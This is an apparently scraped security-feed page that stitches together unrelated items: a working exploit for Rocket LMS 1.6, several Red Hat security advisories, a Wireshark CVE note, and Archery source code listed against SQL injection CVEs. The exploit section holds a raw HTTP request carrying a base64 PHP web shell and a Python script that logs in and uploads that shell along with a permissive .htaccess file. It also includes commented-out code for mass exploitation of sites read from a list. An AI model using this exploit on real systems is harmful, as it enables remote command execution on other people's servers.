Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket:    def __init__(self,ssl,host,port,email,password,file):        self._url_to_upload = "/panel/setting"        self._url_to_login = "/login"        self.host = host        self.port = port        self.ssl = ssl        self.email = email        self.password = password        self.file = file    def get_csrf_token(self,client,URL):               fromt = client.get(URL)          if 'XSRF-TOKEN' in client.cookies:                csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]            return csrftoken        else:               print("Error while fetching token")            return    def login(self):        client = requests.session()        if self.ssl == True:            ssl= "https://"        else:            ssl= "http://"        URL = str(ssl+self.host+":"+self.port+self._url_to_login)        URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)        csrftoken = self.get_csrf_token(client,URL)        fromt = client.get(URL)  # sets cookie              login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')        r = client.post(URL, data=login_data, cookies=client.cookies)                   self.upload_shell(client,URL2)        self.upload_htaccess(client,URL2)    def upload_shell(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)        with open(self.file,"r") as payload:            to_base64 = payload.read()                         to_base64 = str(to_base64).encode("utf-8")            base64_encoded_data=  base64.b64encode(to_base64)            base64_encoded_data = str(base64_encoded_data)[:-1]            base64_encoded_data = str(base64_encoded_data)[2:]                        string = "data:image/php;base64,"+str(base64_encoded_data)            data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")            r = client.post(URL, data=data, cookies=client.cookies)            print(r.status_code)            if r.status_code == 200:                print("sent and uploaded shell :"+URL+"\n")            else:                 print("couldn't upload shell")         def upload_htaccess(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)           string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")        r = client.post(URL, data=data, cookies=client.cookies)        print(r.status_code)        if r.status_code == 200:            print("sent and uploaded htaccess:"+URL+"\n")            print("Go and rename file in filemanager on website")        else:             print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:#     with open("sites.txt","r") as urls:#         url = urls.readlines()#         ssl = True#         port = 443#         for line in url:            #             try:#                 if "sslyok" in line:#                     port = 80#                     ssl = False#                 line = str(line.rstrip('%0a'))                #                 print("trying:"+line)#                 elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")#                 elon.login()#                 time.sleep(1)    #             except Exception:#                 #traceback.print_exc()#                 print("atamadim")                #             finally:#                 print("okey")# except Exception:#                 print("atamadim")

Rocket LMS 1.6 Shell Upload

Red Hat Security Advisory 2022-6426-01 - Multicluster Engine for Kubernetes 2.1.1 images Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds. You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Multicluster Engine for Kubernetes 2.1.1 security update and bug fixes  
Advisory ID:       RHSA-2022:6424-01  
Product:           multicluster engine for Kubernetes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6424  
Issue date:        2022-09-12  
CVE Names:         CVE-2022-36067   
=====================================================================

1. Summary:

Multicluster Engine for Kubernetes 2.1.1 General Availability release  
images,  
which fix bugs and update container images.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Multicluster Engine for Kubernetes 2.1.1 images

Multicluster engine for Kubernetes provides the foundational components  
that are necessary for the centralized management of multiple  
Kubernetes-based clusters across data centers, public clouds, and private  
clouds.

You can use the engine to create new Red Hat OpenShift Container Platform  
clusters or to bring existing Kubernetes-based clusters under management by  
importing them. After the clusters are managed, you can use the APIs that  
are provided by the engine to distribute configuration based on placement  
policy.

Security updates:

* vm2: Sandbox Escape in vm2 (CVE-2022-36067)

Bug fixes:

* MCE 2.1.1 images (BZ# 2125039)

3. Solution:

For multicluster engine for Kubernetes, see the following documentation for  
details on how to install the images:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html-single/multicluster_engine/index#installing-while-connected-online

4. Bugs fixed (https://bugzilla.redhat.com/):

2124794 - CVE-2022-36067 vm2:  Sandbox Escape in vm2  
2125039 - MCE 2.1.1 Images

5. References:

https://access.redhat.com/security/cve/CVE-2022-36067  
https://access.redhat.com/security/updates/classification/#critical

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYx/ZDNzjgjWX9erEAQiE1A/+N5NQLZPXT+DSyeUKNaNZFZfOOGgzG4ka  
Kbekz34kxM8SVjj7Io17wEyfkeakisKsEVXyv+MyYqAurMPFQBHfehzUpMM7XWUK  
frG7ARttABYNIQsXZXNuRV6B7rjB9jkB2pdq2OEbSa+3ubXfzXa++X0S5r1bDMb+  
UYXAIlR9YpO5fYJ6xTjEg6v19ifP6aqAHwzeNYA+IRPGqeNoK1PvNPo4+VT2bce8  
xKTDyC0vi6YWE/3RJ0OqEvJty2vSt5qESOMedmnZmd2VyUSzg2vuJvm+3DHJZ2tQ  
BKz2L0hHeVuph0lFVRdVBy3kIEZ45cm5lc27jSnwpoNBH0xCcJjUjYeTkgyqfYUv  
uIcLz/mrkdUX2fNzY844ifomc2z0rODLUS0jgZ3kzWp9gfoijoOBm9w5Mn6LFo+G  
JF6SGR6PKHCwXLwKdLCwXf4b7rP7goLm2+zvYzbTy/W0hkJ5jao+lEKOtIGNwnre  
Dk4yP5x1mKXwAqnnCJq9pmMsmYXghhMcY1ffTrUDiSCy12C8P5UN+afunsXrL3Z5  
u17csp6j//VgC4qA+eROKncQBl39FQSMhtW5AfZCdgm6bUvjbIFWkTAIM41POgpT  
n2q+0cRCzpeGv3bwbrGUp9KtL2htJYyfNsQERnP6pDMWt+DjHuDePIX85xTZxJRl  
kAfMRwtCpEc=  
=zDFx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6426-01

Red Hat Security Advisory 2022-6427-01 - Red Hat Advanced Cluster Management for Kubernetes 2.6.1 images Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Red Hat Advanced Cluster Management 2.6.1 security fix and bug fix  
Advisory ID:       RHSA-2022:6427-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6427  
Issue date:        2022-09-12  
CVE Names:         CVE-2022-36067   
=====================================================================

1. Summary:

Red Hat Advanced Cluster Management for Kubernetes 2.6.1 release images,  
which provide security fixes, bug fixes, and update container images.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.6.1 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security fix:

* vm2: Sandbox Escape in vm2 (CVE-2022-36067)

Bug fix:

* RHACM 2.6.1 image files (BZ# 2125064)

3. Solution:

For Red Hat Advanced Cluster Management for Kubernetes, see the following  
documentation, which will be updated shortly for this release, for  
important  
instructions on installing this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html-single/install/index#installing

4. Bugs fixed (https://bugzilla.redhat.com/):

2124794 - CVE-2022-36067 vm2:  Sandbox Escape in vm2  
2125064 - RHACM 2.6.1 images

5. References:

https://access.redhat.com/security/cve/CVE-2022-36067  
https://access.redhat.com/security/updates/classification/#critical

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYx/ZBtzjgjWX9erEAQg/xg/+PIqsLUYrUFG5matgYWa0rp2wZMbwP1NG  
AfuDAwz5ofgV5hZHO/mkhpOBwqV+0EPDOmnbxZq2XX3VWpOCLFxoS/q9+iQLKRwF  
kHZxyd6G+OzsPbBL0PZqI4CfQ9EmYLRYOb/SFvWvEXauGt7dz35lA+vRxzPewTfL  
GCWtubrfqew/n77fm5hZNodZbLjLEt7O3Zx+xBsm8oge+ahNFkwPDlmkKqFzJPdC  
i9W1BYd70Pks+Z8wk6Nw5RUvRC5g5Nw4OdS9fcrvgvro+K5RaCbd2udzWWCUux4t  
1myDsrunvKYA7KI3O+4KjM3kBZSc0/9aW5iMWNyaWR00vEDZIHqR+9HZCOL688uJ  
yTNXuKCpQfLEaF0sOekhJtDiAyhxMlsR+7oRirj+RTRRSyKOSEiEeX+l6SS1Kq30  
KxvsmV97gsxObgJzC+KlNibYIIuYq8af5horKFpdR81ne7dV0T5rvCVAM0Fs+LKr  
mJCzgXZ0s/Fvw+KgZLYOPuMD7cvhNpC0UwVqfMZEvcFunqfFjmZmJr/jS+0Zfu70  
xUkSUXaekDNmFplBvFvnZqA6OQGRIzed3YQ4iyMS4UmvYowRNkn44pk34i2K7gZB  
JwSO8EEVuley/o/jkR12JD4pq3OyXtCXxALT1MlYfbvc8seLhZFR3AFm6Ldp5cVN  
16pfxnhvl/w=  
=K+Ym  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6427-01

Red Hat Security Advisory 2022-6317-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.9.48. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.9.48 bug fix and security update  
Advisory ID:       RHSA-2022:6317-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6317  
Issue date:        2022-09-12  
CVE Names:         CVE-2021-39226 CVE-2022-0494 CVE-2022-1353   
                   CVE-2022-2526 CVE-2022-29154   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.9.48 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.9.48. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2022:6319

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Security Fix(es):

* grafana: Snapshot authentication bypass (CVE-2021-39226)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

You may download the oc tool and use it to inspect release image metadata  
as follows:

(For x86_64 architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.48-x86_64

The image digest is  
sha256:fe63bce8c63031a17f08feed4fae704499b749502cb3d51f5df7d8eb002e8e55

(For s390x architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.48-s390x

The image digest is  
sha256:cc5c418771b024b65af22f306c24483421c2e3b351004df1948dc3e9af25b424

(For ppc64le architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.48-ppc64le

The image digest is  
sha256:162a33695defc9acd595451c13ec96eae4557642d6a51521f2aeac22f1c02b8c

All OpenShift Container Platform 4.9 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which  
will be updated shortly for this release, for important instructions on how  
to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

1996013 - sriov-device-plugin cannot found the VF  
2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass  
2096508 - Pod stuck in Terminating, runc init process frozen  
2097724 - Change Ping source spec.jsonData (deprecated) field  to spec.data  
2101092 - Reserved port 9104 prevents a roll out of new cluster-network-operator Pod during SNO 4.10 upgrade  
2101794 - On-prem loadbalancer ports conflict with kube node port range

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-410 - Detect unsupported amount of workloads before rendering a lazy or crashing topology  
OCPBUGS-420 - OVS-Configure doesn't iterate connection names containing spaces correctly  
OCPBUGS-443 - [release-4.9] Gather ODF CephCluster resource status  
OCPBUGS-459 - Default catalogs fails liveness/readiness probes  
OCPBUGS-508 - CI failing tests: Create namespace from install operators creates namespace from operator install page  
OCPBUGS-572 - Machine Controller stuck with Terminated Instances while Provisioning on AWS

6. References:

https://access.redhat.com/security/cve/CVE-2021-39226  
https://access.redhat.com/security/cve/CVE-2022-0494  
https://access.redhat.com/security/cve/CVE-2022-1353  
https://access.redhat.com/security/cve/CVE-2022-2526  
https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYx+EqtzjgjWX9erEAQhj7hAAk1mCFen6d+pVH7k/XA7d+jL2zi5VpxPb  
R96JdAiNK/Pbx6aRYa3K/9q5FsTjGYOq0ycOt6g2GG21vBLTF07KIXRhtV9L7+d+  
SVffQsFprfM4cgClzaZ6qPYWwUNZo3VyfYLbVG49Z7jFxXmUjsxMGG68qgtyJiWJ  
9Dpk1GtC/xXpLsqH+/s56evRijry/iWNqHXLX/fzGQyKBgTGZMPdix53vKqBb90t  
OvPTdc9WnE68jHRK1nxKHkHGdE85mjtTeSX8ELhjwhDmTWFjdrxfmZ/doDAt313l  
VF3uvIoxTmroiUxvxn/kuVphBxbSombgZmBh3+Y53K9RQVqpR3YGo/MDk/B18QwE  
fWcWnbxJTwI+wGrW5+a/pYMlqVwqIYRX7G1fRlCQtVPg7VY6NELr145KoA4iEWGE  
nLSMpe3BbmRxeLlRB31cID10sYOO7JzR/OKkvQdGIH7OkCMLjxHIN9uyaADHTW6p  
7ii5T5LWKvRmuUlJgG0ToSAbk0wjN7LbPPDJPlo2gmiWj3Atdl3cv+475XXeGRTM  
FpAOlcSkDHTmTVxOvYUB1L/8zkTSyLPDbAIXdZi52mai6gOiBrQqOzJozZa9jnh/  
xHnAoeBU8m0Jn2Op7R5NGx5P7I+roQDnz621IUPwpeeNO2botw7f9qi/wwPCaCC7  
x834/6/1kYE=  
=j6ax  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6317-01

Infinite loop in the F5 Ethernet Trailer protocol dissector in Wireshark 3.6.0 to 3.6.7 and 3.4.0 to 3.4.15 allows denial of service via packet injection or crafted capture file

🤖 GitLab Bot 🤖 authored Sep 12, 2022

CVE-2022-3190: 2022/CVE-2022-3190.json · master · GitLab.org / cves · GitLab

Archery v1.7.0 to v1.8.5 was discovered to contain a SQL injection vulnerability via the checksum parameter in the report module.

\# -\*- coding: UTF-8 -\*- from django.urls import path from django.views.i18n import JavaScriptCatalog import sql.instance\_database import sql.query\_privileges import sql.sql\_optimize from common import auth, config, workflow, dashboard, check from common.twofa import totp from sql import views, sql\_workflow, sql\_analyze, query, slowlog, instance, instance\_account, db\_diagnostic, \\ resource\_group, binlog, data\_dictionary, archiver, audit\_log, user from sql.utils import tasks from common.utils import ding\_api urlpatterns \= \[ path('', views.index), path('jsi18n/', JavaScriptCatalog.as\_view(), name\='javascript-catalog'), path('index/', views.index), path('login/', views.login, name\='login'), path('login/2fa/', views.twofa, name\='twofa'), path('logout/', auth.sign\_out), path('signup/', auth.sign\_up), path('sqlworkflow/', views.sqlworkflow), path('submitsql/', views.submit\_sql), path('editsql/', views.submit\_sql), path('submitotherinstance/', views.submit\_sql), path('detail/<int:workflow\_id>/', views.detail, name\='detail'), path('autoreview/', sql\_workflow.submit), path('passed/', sql\_workflow.passed), path('execute/', sql\_workflow.execute), path('timingtask/', sql\_workflow.timing\_task), path('alter\_run\_date/', sql\_workflow.alter\_run\_date), path('cancel/', sql\_workflow.cancel), path('rollback/', views.rollback), path('sqlanalyze/', views.sqlanalyze), path('sqlquery/', views.sqlquery), path('slowquery/', views.slowquery), path('sqladvisor/', views.sqladvisor), path('slowquery\_advisor/', views.sqladvisor), path('queryapplylist/', views.queryapplylist), path('queryapplydetail/<int:apply\_id>/', views.queryapplydetail, name\='queryapplydetail'), path('queryuserprivileges/', views.queryuserprivileges), path('dbdiagnostic/', views.dbdiagnostic), path('workflow/', views.workflows), path('workflow/<int:audit\_id>/', views.workflowsdetail), path('dbaprinciples/', views.dbaprinciples), path('dashboard/', dashboard.pyecharts), path('group/', views.group), path('grouprelations/<int:group\_id>/', views.groupmgmt), path('instance/', views.instance), path('instanceaccount/', views.instanceaccount), path('database/', views.database), path('instanceparam/', views.instance\_param), path('binlog2sql/', views.binlog2sql), path('my2sql/', views.my2sql), path('schemasync/', views.schemasync), path('archive/', views.archive), path('archive/<int:id>/', views.archive\_detail, name\='archive\_detail'), path('config/', views.config), path('audit/', views.audit), path('audit\_sqlquery/', views.audit\_sqlquery), path('audit\_sqlworkflow/', views.audit\_sqlworkflow), path('authenticate/', auth.authenticate\_entry), path('sqlworkflow\_list/', sql\_workflow.sql\_workflow\_list), path('sqlworkflow\_list\_audit/', sql\_workflow.sql\_workflow\_list\_audit), path('sqlworkflow/detail\_content/', sql\_workflow.detail\_content), path('sqlworkflow/backup\_sql/', sql\_workflow.backup\_sql), path('simplecheck/', sql\_workflow.check), path('getWorkflowStatus/', sql\_workflow.get\_workflow\_status), path('del\_sqlcronjob/', tasks.del\_schedule), path('inception/osc\_control/', sql\_workflow.osc\_control), path('sql\_analyze/generate/', sql\_analyze.generate), path('sql\_analyze/analyze/', sql\_analyze.analyze), path('workflow/list/', workflow.lists), path('workflow/log/', workflow.log), path('config/change/', config.change\_config), path('check/inception/', check.inception), path('check/go\_inception/', check.go\_inception), path('check/email/', check.email), path('check/instance/', check.instance), path('group/group/', resource\_group.group), path('group/addrelation/', resource\_group.addrelation), path('group/relations/', resource\_group.associated\_objects), path('group/instances/', resource\_group.instances), path('group/unassociated/', resource\_group.unassociated\_objects), path('group/auditors/', resource\_group.auditors), path('group/changeauditors/', resource\_group.changeauditors), path('group/user\_all\_instances/', resource\_group.user\_all\_instances), path('instance/list/', instance.lists), path('instance/user/list', instance\_account.users), path('instance/user/create/', instance\_account.create), path('instance/user/edit/', instance\_account.edit), path('instance/user/grant/', instance\_account.grant), path('instance/user/reset\_pwd/', instance\_account.reset\_pwd), path('instance/user/lock/', instance\_account.lock), path('instance/user/delete/', instance\_account.delete), path('instance/database/list/', sql.instance\_database.databases), path('instance/database/create/', sql.instance\_database.create), path('instance/database/edit/', sql.instance\_database.edit), path('instance/schemasync/', instance.schemasync), path('instance/instance\_resource/', instance.instance\_resource), path('instance/describetable/', instance.describe), path('data\_dictionary/', views.data\_dictionary), path('data\_dictionary/table\_list/', data\_dictionary.table\_list), path('data\_dictionary/table\_info/', data\_dictionary.table\_info), path('data\_dictionary/export/', data\_dictionary.export), path('param/list/', instance.param\_list), path('param/history/', instance.param\_history), path('param/edit/', instance.param\_edit), path('query/', query.query), path('query/querylog/', query.querylog), path('query/querylog\_audit/', query.querylog\_audit), path('query/favorite/', query.favorite), path('query/explain/', sql.sql\_optimize.explain), path('query/applylist/', sql.query\_privileges.query\_priv\_apply\_list), path('query/userprivileges/', sql.query\_privileges.user\_query\_priv), path('query/applyforprivileges/', sql.query\_privileges.query\_priv\_apply), path('query/modifyprivileges/', sql.query\_privileges.query\_priv\_modify), path('query/privaudit/', sql.query\_privileges.query\_priv\_audit), path('binlog/list/', binlog.binlog\_list), path('binlog/binlog2sql/', binlog.binlog2sql), path('binlog/my2sql/', binlog.my2sql), path('binlog/del\_log/', binlog.del\_binlog), path('slowquery/review/', slowlog.slowquery\_review), path('slowquery/review\_history/', slowlog.slowquery\_review\_history), path('slowquery/optimize\_sqladvisor/', sql.sql\_optimize.optimize\_sqladvisor), path('slowquery/optimize\_sqltuning/', sql.sql\_optimize.optimize\_sqltuning), path('slowquery/optimize\_soar/', sql.sql\_optimize.optimize\_soar), path('slowquery/optimize\_sqltuningadvisor/', sql.sql\_optimize.optimize\_sqltuningadvisor), path('slowquery/report/', slowlog.report), path('db\_diagnostic/process/', db\_diagnostic.process), path('db\_diagnostic/create\_kill\_session/', db\_diagnostic.create\_kill\_session), path('db\_diagnostic/kill\_session/', db\_diagnostic.kill\_session), path('db\_diagnostic/tablesapce/', db\_diagnostic.tablesapce), path('db\_diagnostic/trxandlocks/', db\_diagnostic.trxandlocks), path('db\_diagnostic/innodb\_trx/', db\_diagnostic.innodb\_trx), path('archive/list/', archiver.archive\_list), path('archive/apply/', archiver.archive\_apply), path('archive/audit/', archiver.archive\_audit), path('archive/switch/', archiver.archive\_switch), path('archive/once/', archiver.archive\_once), path('archive/log/', archiver.archive\_log), path('4admin/sync\_ding\_user/', ding\_api.sync\_ding\_user), path('audit/log/', audit\_log.audit\_log), path('audit/input/', audit\_log.audit\_input), path('user/list/', user.lists), path('user/qrcode/<str:data>/', totp.generate\_qrcode), \]

CVE-2022-38538: Archery/urls.py at v1.8.5 · hhyo/Archery

Archery v1.7.5 to v1.8.5 was discovered to contain a SQL injection vulnerability via the where parameter at /archive/apply.

CVE-2022-38539: Archery/urls.py at v1.8.5 · hhyo/Archery

Archery v1.4.5 to v1.8.5 was discovered to contain multiple SQL injection vulnerabilities via the start_file, end_file, start_time, and stop_time parameters in the binlog2sql interface.

CVE-2022-38537: Archery/urls.py at v1.8.5 · hhyo/Archery

Archery v1.8.3 to v1.8.5 was discovered to contain multiple SQL injection vulnerabilities via the start_time and stop_time parameters in the my2sql interface.

CVE-2022-38541: Archery/urls.py at v1.8.5 · hhyo/Archery

Archery v1.4.0 to v1.8.5 was discovered to contain a SQL injection vulnerability via the ThreadIDs parameter in the create_kill_session interface.

Tag

#js